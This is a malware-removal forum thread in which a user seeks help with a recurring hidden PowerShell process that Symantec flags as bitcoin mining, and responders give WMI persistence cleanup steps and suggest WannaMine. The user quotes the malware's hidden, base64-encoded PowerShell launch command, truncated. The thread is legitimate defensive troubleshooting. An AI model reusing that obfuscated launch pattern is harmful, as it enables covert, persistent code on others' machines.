Powershell Script - Malware Attack Bitcoin

[randomguy 0]

Hi All,

First of all, I believe we have a similar issue to the below:

PowerShell Script - Possible Malicious Attack

By Marco2526, November 2, 2017 in Malware Finding and Cleaning

https://forum.eset.com/topic/13651-powershell-script-possible-malicious-attack/ 

 

A powershell script is ran every hour or so (I can forcefully close it to stop the attack but it will start back up). I found the below in the WMI of SysInternals Autoruns. Symantec is constantly reporting this below message when the script is running: [SID: 30253] system infected: bitcoinminer Activity 6 detected. Can anyone please provide assistance?

DSM Event Log Consumer   %SystemRoot%\system32\WindowsPowerShell\v1.0\PowerShell.exe  

powershell.exe -NoP -NonI -W Hidden  -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAANAAoAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAO....... (there is a huge amount of text that continues here)

Kind Regards Regards

[itman 1,659]

-EDIT- Before doing the below, open up Process Explorer/Task Manager and let me know if powershell.exe is running as a child process under wmiprvse.exe.

Disable the WMI consumer event in Autoruns as follows:

Quote

WMI

The WMI tab lists registered WMI event consumers that can be configured to run arbitrary scripts or command lines when a particular event occurs. When you select an entry on the WMI tab, the lower panel reports information about the target file, the event consumer’s full command line, and the condition, such as a WQL query, that will trigger the event consumer to execute.

When you disable a WMI entry, Autoruns replaces the entry with a clone that has the same name but with “_disabled” appended. This breaks the binding to the event filter so that it won’t execute. By re-enabling, the original name and the event binding is reestablished.

These events and bindings are stored in the WMI repository in the ROOT\subscription namespace.

https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2

If no adverse effects from above and this stops the activity, you can remove the consumer event.

You mention Symantec in your posting. Are you using an Eset product?

Edited February 7, 2018 by itman

[JamesR 52]

@randomguy

1. Please download and generate an ELC log from here: https://www.eset.com/int/support/log-collector/

2. Also, please try this newer version of the WMILister v3.0 on the server.  Please supply any logs generated by this and ELC in a reply on the ESET Forums.  If any odd scripts are found, you will be prompted if you want to remove them.  It is best to review the log which will be saved inside of a Log folder in the same folder the utility was run from.

https://eset.sharefile.com/d-sb6232c1bc5240709

Run this command as admin (logs will be generated in same folder as tool and saved inside of a Logs folder):

cscript //nologo WMILister_30.vbs

If scripts are found, you will be prompted to remove the.

3. Reboot after stating "y" to prompt for cleaning.  To see advanced usage of this tool, please see this post: 

 

 

This log will also let me know if it is indeed a WMI Persistent threat.  Since autoruns flagged WMI, it likely is using WMI persistence and if I remember correctly, autoruns doesn't properly disable WMI scripting (I could be wrong on this and I am not near a test environment).

 

Regards,

JamesR

Edited March 2, 2018 by JamesR
Updated steps to point to latest WMILister

[itman 1,659]

I will also add that based on the Powershell command execution being deployed, it is likely you may have been nailed by Monero WannaMine: https://www.pandasecurity.com/mediacenter/pandalabs/threat-hunting-fileless-attacks/ .

Are your OS patches up to date; especially in regards to the EternalBlue NSA exploit?

Edited February 8, 2018 by itman